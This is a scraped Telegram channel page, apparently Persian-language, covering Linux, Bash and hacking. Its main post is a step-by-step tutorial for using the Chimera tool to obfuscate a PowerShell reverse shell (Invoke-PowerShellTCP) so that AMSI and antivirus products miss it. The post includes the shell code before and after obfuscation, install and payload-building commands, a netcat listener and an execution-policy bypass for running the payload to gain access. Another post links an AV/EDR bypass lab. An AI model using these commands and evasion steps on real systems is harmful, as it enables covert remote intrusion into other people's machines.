Kernel Kudos – Telegram
Kernel Kudos
1.74K subscribers
110 photos
50 videos
112 files
256 links
🪐 This channel talks about: C, Linux, Bash, and so on 🕸️

🌀 Buy Me Coffee
USDT BEP20 : 0xbc8e52af7b46461b8076085Be771F465E26A9Dfd

🐞 YouTube: https://youtube.com/@KernelKudos

Chat: { https://news.1rj.ru/str/+ftxZVA8V_ns5ZmY8 }

🔴 whoami : { @FirstTarokh }
Download Telegram
Kernel Kudos
introduction-to-bash-noscripting-dark.pdf
#Bash Scripting Introduction

🔸 For those who have familiarity with Linux and it's bash and want to improve their knowledge in noscripting and automating Linux tasks .

این کتاب بهتون ایده میده . ولی خب اول باید لینوکس بلد باشید بعد برید سراغش
3
ابزار Chimera ابزاری برای Obfuscate کردن اسکریپ های پاورشل برای بایپس AMSI ( Anti Malware Scan Interface ) و انتی ویروس ها هست.

تیکه کد زیر بخشی از Invoke-PowerShellTCP.ps1 هست که توسط 25 تا از انتی ویروس ها شناسایی شده : ( مشاهده عکس )

$stream = $client.GetStream()
[byte[]]$bytes = 0..65535|%{0}
$sendbytes = ([text.encoding]::ASCII).GetBytes("Windows PowerShell running as user " + $env:username + " on " + $env:computername + "`n Copyright (C) 2015 Microsoft Corporation. All rights reserved.`n`n")
$stream.Write($sendbytes,0,$sendbytes.Length)
$sendbytes = ([text.encoding]::ASCII).GetBytes('PS ' + (Get-Location).Path + '>')
$stream.Write($sendbytes,0,$sendbytes.Length)

اما تیکه کد زیر بعد از Obfuscate کردن کد بالا توسط ابزار Chimera هست که هیچ آنتی ویروسی نتونسته تشخیص بده : ( مشاهده عکس )

$xdgIPkCcKmvqoXAYKaOiPdhKXIsFBDov = $jYODNAbvrcYMGaAnZHZwE."$bnyEOfzNcZkkuogkqgKbfmmkvB$ZSshncYvoHKvlKTEanAhJkpKSIxQKkTZJBEahFz$KKApRDtjBkYfJhiVUDOlRxLHmOTOraapTALS"()
[bYte[]]$mOmMDiAfdJwklSzJCUFzcUmjONtNWN = 0..65535|%{0}
$PqJfKJLVEgPdfemZPpuJOTPILYisfYHxUqmmjUlKkqK = ([teXt.enCoDInG]::AsCII)."$mbKdotKJjMWJhAignlHUS$GhPYzrThsgZeBPkkxVKpfNvFPXaYNqOLBm"("WInDows Powershell rUnnInG As User " + $TgDXkBADxbzEsKLWOwPoF:UsernAMe + " on " + $TgDXkBADxbzEsKLWOwPoF:CoMPUternAMe + "`n CoPYrIGht (C) 2015 MICrosoft CorPorAtIon. All rIGhts reserveD.`n`n")
$xdgIPkCcKmvqoXAYKaOiPdhKXIsFBDov.WrIte($PqJfKJLVEgPdfemZPpuJOTPILYisfYHxUqmmjUlKkqK,0,$PqJfKJLVEgPdfemZPpuJOTPILYisfYHxUqmmjUlKkqK.LenGth)


نحوه ی نصب در Linux :
1. نصب پیش نیاز ها :
sudo apt-get update && sudo apt-get install -Vy sed xxd libc-bin curl jq perl gawk grep coreutils git

2. کلون کردن ریپو :
sudo git clone https://github.com/tokyoneon/chimera /opt/chimera

3. تغییر سطح دسترسی اسکریپت به روت ( اگرکاربر روت نیستید ) :
sudo chown root:root -R /opt/chimera/

4. تغییر مسیر به opt/chimera/ :
cd /opt/chimera/

5. تغییر دسترسی اسکریپت به قابلیت اجرا شدن :
sudo chmod +x chimera.sh

6. نهایتا با دستور زیر میتونید اسکریپت رو اجراکنید :
./chimera.sh —help

نحوه ی استفاده از اسکریپت :
1. ساخت Payload :
./chimera --file Shell_Code.ps1 --all --output /tmp/payload.ps1

2. جایگزین کردن ListenerIP/TargetIP و ListenerPort/TargetPort در داخل پیبود :
1.2 تغییر ایپی :
sed -i 's/Listener_IP/Target_IP/g' shells/Payload.ps1
2.2 تغییر پورت :
پورت دیفالت اسکریپت 444 هستش :
sed -i 's/4444/Target_Port/g' shells/*.ps1

گرفتن دسترسی :
1. ایجاد Listener در لینوکس با NetCat :
nc -v -l -p 4444
2. فایل رو روی پاورشل ویندوز با دستور زیر اجرا کنید :
powershell.exe -ep bypass C:\<PATH>\Payload.ps1

و تمام.
امیدوارم از آموزش خوشتون بیاد...
Author : X P 4
Special Tnx to : AK47
🔥2
یک آزمایشگاه کوچیک خوب برای تمرین و روش های دور زدن Antivirus , EDR

🟡 Little AV/EDR bypassing lab for training & learning purposes


🌐 https://github.com/Xacone/BestEdrOfTheMarket
👍1
درمورد چه مباحثی دوست دارید بیشتر داکیومنت و کتاب بزارم
Anonymous Poll
30%
برنامه نویسی
24%
شبکه
40%
هک و امنیت
6%
دواپس
درمورد کدوم زبان برنامه نویسی بیشتر کتاب و داکیومنت بزارم
Anonymous Poll
34%
C/C++
4%
C#
13%
PHP, JavaScript
32%
Python
3%
SQL
10%
Rust
4%
Ruby, Scala, . . . . .
OpenSSL Announces Final Release of OpenSSL 3.2.0
Article, Comments
1
Unix Shells and the Current Directory
Article, Comments